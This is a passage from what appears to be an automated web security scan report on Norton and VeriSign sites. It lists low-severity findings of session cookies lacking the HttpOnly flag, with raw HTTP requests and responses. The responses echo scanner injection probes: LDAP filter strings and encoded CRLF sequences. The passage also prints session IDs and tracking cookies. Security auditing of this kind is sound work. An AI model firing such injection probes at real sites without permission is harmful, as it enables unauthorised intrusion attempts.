HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Date: Fri, 09 Sep 2011 21:31:22 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 58568 Connection: Keep-Alive <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
10.17. http://buy.norton.com/estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:symSessionGuid=6096FB79-2899-3CBF-0291-6529FB9376B7; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:20 GMT; path=/ sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:20 GMT; path=/ The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/ HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:38:20 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=6096FB79-2899-3CBF-0291-6529FB9376B7; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:20 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:20 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 41047 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
10.18. http://buy.norton.com/estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:symSessionGuid=6BFF5F18-81A0-7426-AE16-067CCC63D696; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:17 GMT; path=/ sessionExpiration=CH#de#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:17 GMT; path=/ The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/ HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:38:17 GMT Pragma: no-cache Location: http://buy.norton.com/estore/mf/errorProductNotFound Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=6BFF5F18-81A0-7426-AE16-067CCC63D696; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:17 GMT; path=/ Set-Cookie: sessionExpiration=CH#de#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:17 GMT; path=/ Content-Language: de-CH X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 299 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://buy.norton.com/estore/mf/er...[SNIP]...
10.19. http://buy.norton.com/upgrades-renewals
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/upgrades-renewals
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:JSESSIONID=vxdTTqHVp98yyfVwX91lmbQpnYvxnzf3hLdx0n14FYn99LpNvJgb!-50551110; path=/ FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ LASTTIME_CV_DATE=Sep-09-2011 14:37:25; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /upgrades-renewals HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:25 GMT Location: http://buy.norton.com/estore/mf/upgradeRenewal?rdid=0519b9aa-f875-4235-8757-656f0af7db991315604245144Set-Cookie: JSESSIONID=vxdTTqHVp98yyfVwX91lmbQpnYvxnzf3hLdx0n14FYn99LpNvJgb!-50551110; path=/ Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: LANGUAGE=en; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:37:25; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 397 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://buy.norton.com/estore/mf/up...[SNIP]...
10.20. https://idprotect.verisign.com/toolbar/activate.v
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://idprotect.verisign.com
Path:
/toolbar/activate.v
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc; Path=/; Secure The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /toolbar/activate.v HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: idprotect.verisign.com Connection: Keep-Alive
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:48:59 GMTSet-Cookie: JSESSIONID=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc; Path=/; Secure Content-Type: text/html;charset=utf-8 Content-Length: 7564 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]...
10.21. http://m.verisign.com/
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://m.verisign.com
Path:
/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=1695809E810A8CD4C2D73D9071CB7888.tomcat2; Path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: m.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 22:03:48 GMT Server: ApacheSet-Cookie: JSESSIONID=1695809E810A8CD4C2D73D9071CB7888.tomcat2; Path=/ Location: http://m.verisign.com/home.v;jsessionid=1695809E810A8CD4C2D73D9071CB7888.tomcat2 Content-Length: 0 Content-Type: text/html
10.22. http://mbox3.offermatica.com/m2/verisign/mbox/standard
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://mbox3.offermatica.com
Path:
/m2/verisign/mbox/standard
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:mboxSession=1315621455064-973488; Domain=offermatica.com; Expires=Fri, 09-Sep-2011 21:56:52 GMT; Path=/m2/verisign The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621580604-481541&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_TS_Main&mboxId=0&mboxURL=http%3A//www.verisign.com/trust-seal/index.html%3Ftid%3Dgnps&mboxReferrer=&mboxVersion=31 HTTP/1.1 Host: mbox3.offermatica.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mboxPC=1315621455064-973488.19
Response
HTTP/1.1 302 Moved Temporarily Server: Test & Target P3P: CP="NOI DSP CURa OUR STP COM" Date: Fri, 09 Sep 2011 21:25:51 GMT Location: http://mbox3.offermatica.com/m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621580604-481541&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_TS_Main&mboxId=0&mboxURL=http%3A//www.verisign.com/trust-seal/index.html%3Ftid%3Dgnps&mboxReferrer=&mboxVersion=31&mboxXDomainCheck=trueSet-Cookie: mboxSession=1315621455064-973488; Domain=offermatica.com; Expires=Fri, 09-Sep-2011 21:56:52 GMT; Path=/m2/verisign Content-Length: 0
10.23. https://onlinefamily.norton.com/familysafety/loginStart.fs
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://onlinefamily.norton.com
Path:
/familysafety/loginStart.fs
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:JSESSIONID=C487A83A71391D525794280EAF628915; Path=/familysafety formVersion=1315604755623; Path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /familysafety/loginStart.fs?inid=us_2010June_NOF HTTP/1.1 Host: onlinefamily.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:45:55 GMT Server: Apache Set-Cookie: user_pref_lang=eng; Expires=Thu, 08-Dec-2011 21:45:55 GMT; Path=/ Set-Cookie: formVersion=1315604755623; Path=/Set-Cookie: JSESSIONID=C487A83A71391D525794280EAF628915; Path=/familysafety Cache-Control: no-cache,no-store,must-revalidate,max-stale=0 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Connection: close Vary: Accept-Encoding Content-Length: 37906 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <...[SNIP]...
10.24. https://products.verisign.com/geocenter/reseller/doregister.do
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://products.verisign.com
Path:
/geocenter/reseller/doregister.do
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=BLTnTqJKyGPctfv1FdlqcJ70S5h6p0Gvlmy4hN8gznRX5SWKqb6t!1264420788; path=/; secure The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /geocenter/reseller/doregister.do HTTP/1.1 Host: products.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache="Set-Cookie" Connection: close Date: Fri, 09 Sep 2011 21:46:18 GMT Content-Type: text/html;charset=UTF-8Set-Cookie: JSESSIONID=BLTnTqJKyGPctfv1FdlqcJ70S5h6p0Gvlmy4hN8gznRX5SWKqb6t!1264420788; path=/; secure X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 8588 <html> <head> <title>Referring Partner Code Error</title> <link href="/geocenter/style.css" type=text/css rel="stylesheet"> <style type=...[SNIP]...
10.25. https://products.verisign.com/geocenter/reseller/logon.do
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://products.verisign.com
Path:
/geocenter/reseller/logon.do
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=JLFcTqJFrTLDMrnDfsKJpnM1TKGWGdMnR63n8jNnvndRhmkDzJCZ!1264420788; path=/; secure The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /geocenter/reseller/logon.do HTTP/1.1 Host: products.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache="Set-Cookie" Connection: close Date: Fri, 09 Sep 2011 21:46:13 GMT Content-Type: text/html;charset=UTF-8Set-Cookie: JSESSIONID=JLFcTqJFrTLDMrnDfsKJpnM1TKGWGdMnR63n8jNnvndRhmkDzJCZ!1264420788; path=/; secure X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 17095 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <link href="/geocenter/style_verisign.css" type=text/css rel="STYLES...[SNIP]...
10.26. https://products.verisign.com/geocenter/reseller/register.do
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://products.verisign.com
Path:
/geocenter/reseller/register.do
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=LFLdTqJKs7gRRpXLyKDGZh0GycTV9zGf0v1HCZvtSZfhRmTRGJC2!1264420788; path=/; secure The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /geocenter/reseller/register.do?vatCountry= HTTP/1.1 Host: products.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache="Set-Cookie" Connection: close Date: Fri, 09 Sep 2011 21:46:18 GMT Content-Type: text/html;charset=UTF-8Set-Cookie: JSESSIONID=LFLdTqJKs7gRRpXLyKDGZh0GycTV9zGf0v1HCZvtSZfhRmTRGJC2!1264420788; path=/; secure X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 8588 <html> <head> <title>Referring Partner Code Error</title> <link href="/geocenter/style.css" type=text/css rel="stylesheet"> <style type=...[SNIP]...
10.27. https://securitycenter.verisign.com/celp/enroll/outsideSearch
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://securitycenter.verisign.com
Path:
/celp/enroll/outsideSearch
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=OqJ57BcEDySGMZg17yokdHt03FquFgyYGEezg44I0uZ1diTyCIN7!-1800460983; path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /celp/enroll/outsideSearch HTTP/1.1 Host: securitycenter.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:46:33 GMT Content-length: 408 Content-type: text/html Last-Modified: Mon, 12 Jan 2004 23:04:38 GMTSet-Cookie: JSESSIONID=OqJ57BcEDySGMZg17yokdHt03FquFgyYGEezg44I0uZ1diTyCIN7!-1800460983; path=/ Accept-Ranges: bytes Connection: close <html> <head> <title>VeriSign Retail</title> <META HTTP-EQUIV="Pragma" CONTENT="no-cache"> <META HTTP-EQUIV="Expires" CONTENT="-1"> </head> <body bgcolor="#ffffff"> <h1>System Unavailable</h1>...[SNIP]...
10.28. https://securitycenter.verisign.com/celp/enroll/retail
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://securitycenter.verisign.com
Path:
/celp/enroll/retail
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=OqIZWIQD33u9AZA3Ap2HnemKDA9cEWwlrgBQZ31zh5e1fWNs3qL2!-1800460983; path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /celp/enroll/retail;jsessionid=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983 HTTP/1.1 Host: securitycenter.verisign.com Connection: keep-alive Referer: http://www.verisign.com/code-signing/index.html?tid=a_box User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:43:53 GMT Content-length: 408 Content-type: text/html Last-Modified: Mon, 12 Jan 2004 23:04:38 GMTSet-Cookie: JSESSIONID=OqIZWIQD33u9AZA3Ap2HnemKDA9cEWwlrgBQZ31zh5e1fWNs3qL2!-1800460983; path=/ Accept-Ranges: bytes <html> <head> <title>VeriSign Retail</title> <META HTTP-EQUIV="Pragma" CONTENT="no-cache"> <META HTTP-EQUIV="Expires" CONTENT="-1"> </head> <body bgcolor="#ffffff"> <h1>System Unavailable</h1>...[SNIP]...
10.29. https://securitycenter.verisign.com/celp/enroll/upsell
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://securitycenter.verisign.com
Path:
/celp/enroll/upsell
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=OqE10CQDoczcE12dL3a6BYK7SmniMvBhWXtc1NQr68hhq3LGOaAg!-1800460983; path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /celp/enroll/upsell?application_locale=VRSN_US&originator=VeriSign:CELP&bundle_id=MSIECS002 HTTP/1.1 Host: securitycenter.verisign.com Connection: keep-alive Referer: http://www.verisign.com/code-signing/index.html?tid=a_box User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:27:18 GMT Content-type: text/html;charset=UTF-8 Location: https://securitycenter.verisign.com/celp/enroll/retailSet-Cookie: JSESSIONID=OqE10CQDoczcE12dL3a6BYK7SmniMvBhWXtc1NQr68hhq3LGOaAg!-1800460983; path=/ Content-Length: 303 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://securitycenter.verisign.co...[SNIP]...
10.30. https://trust-center.verisign.com/process/retail/session_timeout
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://trust-center.verisign.com
Path:
/process/retail/session_timeout
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; Path=/; Secure TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; Path=/; Domain=.verisign.com The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /process/retail/session_timeout HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: vtrh54nwcc; v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=03CA6F76DB2F10DB4BFEB1847A7DDBAF
Response
